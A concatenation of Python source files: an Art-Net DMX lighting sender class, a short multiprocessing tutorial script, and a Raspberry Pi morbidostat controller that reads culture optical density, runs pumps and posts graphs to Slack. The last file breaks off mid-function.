self._host = host
self._port = port
self._number_of_channels = number_of_channels
self._default_level = default_level
# Number of channels must be even
if number_of_channels % 2 != 0:
self._number_of_channels += 1
# Initialise the DMX channel array with the default values
self._channels = [self._default_level] * self._number_of_channels
# Initialise socket
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
packet = bytearray()
packet.extend(map(ord, "Art-Net"))
packet.append(0x00) # Null terminate Art-Net
packet.extend([0x00, 0x50]) # Opcode ArtDMX 0x5000 (Little endian)
packet.extend([0x00, 0x0e]) # Protocol version 14
packet.extend([0x00, 0x00]) # Sequence, Physical
packet.extend([0x00, 0x00]) # Universe
packet.extend(pack('>h', self._number_of_channels)) # Pack the number of channels Big endian
self._base_packet = packet
# start sending ARTNET
threa = Thread(target=self.send)
threa.start()
self.stopThread = False
def send(self):
"""
Send the current state of DMX values to the gateway via UDP packet.
"""
while True:
# Copy the base packet then add the channel array
packet = self._base_packet[:]
packet.extend(self._channels)
self._socket.sendto(packet, (self._host, self._port))
# logging.debug("Sending Art-Net frame")
time.sleep(1. / 40)
def set_channels(self, channels, value, send_immediately=True):
# Single value for standard channels, RGB channels will have 3 or more
value_arr = [value]
if type(value) is tuple or type(value) is list:
value_arr = value
for x, channel in enumerate(channels):
default_value = value_arr[min(x, len(value_arr) - 1)]
self._channels[channel - 1] = default_value
# if send_immediately:
# self.send()
@asyncio.coroutine
def set_channels_async(self, channels, value, transition=0, fps=40, send_immediately=True):
original_values = self._channels[:]
# Minimum of one frame for a snap transition
number_of_frames = max(int(transition * fps), 1)
# Single value for standard channels, RGB channels will have 3 or more
value_arr = [value]
if type(value) is tuple or type(value) is list:
value_arr = value
for i in range(1, number_of_frames + 1):
values_changed = False
for x, channel in enumerate(channels):
target_value = value_arr[min(x, len(value_arr) - 1)]
increment = (target_value - original_values[channel - 1]) / (number_of_frames)
next_value = int(round(original_values[channel - 1] + (increment * i)))
if self._channels[channel - 1] != next_value:
self._channels[channel - 1] = next_value
values_changed = True
# if values_changed and send_immediately:
# self.send()
yield from asyncio.sleep(1. / fps)
def get_channel_level(self, channel):
"""
Return the current value we have for the specified channel.
"""
return self._channels[int(channel) - 1]
def set_channel_rgb(self, channel, values, send_immediately=True):
for i in range(0, len(values)):
logging.debug('Setting channel %i to %i with send immediately = %s', channel + i, values[i], send_immediately)
if (channel + i <= self._number_of_channels) and (0 <= values[i] <= 255):
self._channels[channel - 1 + i] = values[i]
# if send_immediately is True:
# self.send()
return True
@property
def default_level(self):
return self._default_level
def scale_rgb_to_brightness(rgb, brightness):
brightness_scale = (brightness / 255)
scaled_rgb = [round(rgb[0] * brightness_scale),
round(rgb[1] * brightness_scale),
round(rgb[2] * brightness_scale)]
return scaled_rgb
|
Episode 08 - Multiprocessing in Windows.py
|
import time
from multiprocessing import Process
def ask_user():
start = time.time()
user_input = input('Enter your name: ')
greet = f'Hello {user_input}, nice to see you here..!'
print(greet)
print(f'ask_user, {time.time() - start}')
def complex_calculation():
start = time.time()
print('Started Calculating..!')
[x**2 for x in range(20000000)]
print(f'complex_calculation, {time.time() - start}')
start = time.time()
ask_user()
complex_calculation()
print(f'Single thread total time : {time.time() - start}')
if __name__ == '__main__':
process = Process(target=complex_calculation)
process2 = Process(target=ask_user)
process.start()
process2.start()
start = time.time()
process.join()
process2.join()
print(f'Two processes total time: {time.time() - start}')
|
master.py
|
#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
import adafruit_ads1x15.ads1115 as ADS_HR
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
from scipy import signal
# Needed for Slack Integration
# import slack
from slackclient import SlackClient
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
totsys = (''.join(config.sections())).count('CU')
actsys = []
for sysiter in range(totsys):
if config['CU' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
# slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
slack_client = SlackClient(config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
comb_mesg = []
comb_saveloc = ''
comb_lat_sw = ['First','']
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
odcsvs = []
pumpcsvs = []
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
if config['MAIN'].getboolean('ads1115'):
adc.append(ADS_HR.ADS1115(i2c, address = add))
else:
adc.append(ADS.ADS1015(i2c, address = add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address = add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
if config['MAIN'].getboolean('repeat1_evar'):
morbidostats.append([Morbidostat([sysnum, 1], len(actsys), chips, slack_client), sysnum])
else:
morbidostats.append([Morbidostat([sysnum, sysnum], len(actsys), chips, slack_client), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slackms = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting CUs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1:
combgen = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Combined Graphs'
)
comblat = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Latest Combined Graphs'
)
global comb_mesg
comb_mesg = [combgen['ts'], comblat['ts']]
def graph_controller():
while True:
if len(graph_q) is 0:
time.sleep(20)
else:
if graph_q[0] is 'C':
comb_grapher()
else:
morbidostats[graph_q[0]][0].graphOD()
graph_q.pop(0)
def i2c_controller():
while True:
if len(i2c_q) is 0:
time.sleep(0.05)
else:
if i2c_q[0][1] is 'O':
morbidostats[int(i2c_q[0][0])][0].get_OD()
elif i2c_q[0][1] is 'C':
morbidostats[int(i2c_q[0][0])][0].control_alg()
i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
global odcsvs
global pumpcsvs
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
Process(target = plotter.Plotter, args = (actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])).start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1: threading.Thread(target = comb_graph_scheduler).start()
def comb_graph_scheduler():
global comb_saveloc
root_dir = config['MAIN']['save_location']
comb_saveloc = root_dir + '/Combined/' + str(datetime.now()) + '/'
os.makedirs(comb_saveloc)
while True:
time.sleep(config['MAIN'].getfloat('comb_graph_freq')*60)
global graph_q
graph_q.append('C')
def comb_grapher():
ods = []
leg = []
print('Generating Combined Graphs')
fig = plt.figure(dpi=140)
ax = plt.gca()
for i in actsys: leg.append('CU'+str(i))
for i in odcsvs:
ods.append(pd.read_csv(i,index_col='hour'))
ods[-1][['average']].plot(ax=ax,figsize=(7,5))
ax.legend(leg)
ax.set_ylabel('Raw OD')
ax.set_xlabel('Time(h)')
global comb_saveloc
fig.savefig(comb_saveloc + 'RawOD.png')
plt.close('all')
fig = None; ax = None
fig2 = plt.figure(dpi=140)
ax2 = plt.gca()
for i in ods:
i[['average']].divide(float(i.iloc[-1][['maxod']])).plot(ax=ax2,figsize=(7,5))
ax2.legend(leg)
ax2.set_ylabel('Scaled OD')
ax2.set_xlabel('Time(h)')
fig2.savefig(comb_saveloc + 'ScaledOD.png')
plt.close('all')
fig2 = None; ax2 = None
global comb_mesg
global comb_lat_sw
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
combgen_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
combgen_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "ScaledOD",
file = file_content
)
if comb_lat_sw[0] is 'First':
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
else:
delcomb = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[0]
)
delcombs = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[1]
)
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
while True:
f = open(device_file, 'r')
lines = f.readlines()
f.close()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
time.sleep(3)
class Morbidostat:
def __init__(self, sysnum, actsys, chips, slack_client):
self.printing = False
self.sysnum = sysnum[0]
self.varnum = sysnum[1]
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'CU' + str(self.sysnum)
self.varstr = 'CU' + str(self.varnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.varstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.varstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.varstr].getfloat('OD_min')
self.OD_err = self.config[self.varstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.varstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.varstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.varstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.varstr].getfloat('P_drug_times')
self.drug_pump_flo_rate = self.config[self.varstr].getfloat('drug_pump_flo_rate')
self.P_nut_times = self.config[self.varstr].getfloat('P_nut_times')
self.nut_pump_flo_rate = self.config[self.varstr].getfloat('nut_pump_flo_rate')
self.P_waste_times = self.config[self.varstr].getfloat('P_waste_times')
self.waste_pump_flo_rate = self.config[self.varstr].getfloat('waste_pump_flo_rate')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.varstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
# self.OD_av_length = self.config[self.varstr].getint('OD_av_length')
# # OD averaging buffer
# self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.filtwindow = signal.firwin(self.config[self.varstr].getint('length_of_od_filter'), self.config[self.varstr].getfloat('low_pass_corner_frequ'), fs = 1/self.time_between_ODs)
self.window = signal.lfilter_zi(self.filtwindow , 1)
self.thresh_check = self.config[self.varstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.vial_drug_mass = 0
self.culture_vol = self.config[self.varstr].getint('culture_vol')
self.pump_act_times = []
self.dil_rate = 0
self.max_dil_rate = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.varstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
# num_cham = 1 # number of morbidostat vials being used
if config['MAIN'].getboolean('ads1115'):
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS_HR,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
else:
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_led_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
self.ledind = self.config[self.sysstr]['P_ind_pins'].isdigit()
if self.ledind:
self.P_ind_pins = self.config[self.sysstr].getint('P_ind_pins')
self.pin_list.append(self.P_ind_pins)
self.init_pins(self.pin_list)
self.init_time = datetime.now()
self.drug_name = self.config[self.varstr]['drug']
self.drug_conc = self.config[self.varstr].getfloat('drug_conc')
self.drug_vol = self.config[self.varstr].getfloat('drug_vol')
self.slack_client = SlackClient(self.config['MAIN']['slack_key'])
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
if self.P_drug_times * self.drug_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate or self.P_nut_times * self.nut_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate:
print('[%s] WARNING: Net volume of the CU will change over time with the currently configured pump times.' % self.sysstr)
volwarn = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'WARNING: Net volume of the CU will change over time with the currently configured pump times.'
)
initmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
if self.root_dir[-1] == '/': self.root_dir.pop(-1)
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
self.initalmessage = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
self.selection = self.config[self.varstr]['selection_alg']
self.vial_conc = self.config[self.varstr].getfloat('vial_conc')
def init_pins(self,pin_list):
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
def get_OD(self):
print_buffer = 0
self.init_pins([self.P_LED_pins, self.P_ind_pins]) if self.ledind else self.init_pins([self.P_LED_pins])
try:
if self.pipins:
GPIO.output(self.P_LED_pins,1)
if self.ledind: GPIO.output(self.P_ind_pins,1)
else:
self.pins[self.P_LED_pins].value = True
if self.ledind: self.pins[self.P_ind_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
if self.pipins:
GPIO.output(self.P_LED_pins,0)
if self.ledind: GPIO.output(self.P_ind_pins,0)
else:
self.pins[self.P_LED_pins].value = False
if self.ledind: self.pins[self.P_ind_pins].value = False
except:
print ('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
pass
# self.avOD_buffer = self.avOD_buffer + [self.currOD]
# self.avOD_buffer.pop(0)
# self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
[self.avOD], self.window = signal.lfilter(self.filtwindow, 1, [self.currOD], zi = self.window)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
def all_pump_off(self):
if self.pipins:
for i in pin_list:
GPIO.output(i, 0)
else:
for i in pin_list:
self.pins[i].value = False
print('[%s] Turning off all pump' % (self.sysstr,pump))
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.dil_rate]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
if self.max_dil_rate < self.dil_rate: self.max_dil_rate = self.dil_rate
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.max_dil_rate]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.max_dil_rate = self.dil_rate
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
file.close()
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
file.close()
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
file.close()
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
file.close()
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
print('[%s] Generating graph' % self.sysstr)
try:
elapmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
odmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','vial_drug_mass'
allconcs = allpumps[['vial_drug_mass']]/self.culture_vol
allconcs.rename(columns={'vial_drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='vial_drug_mass',color='tab:orange',legend=False)
DM.set_ylabel('%s Concentration (ug/mL)' % self.drug_name.capitalize())
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
concmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
pumpa = allpumps[['media','drug','waste']]
PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
pumsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
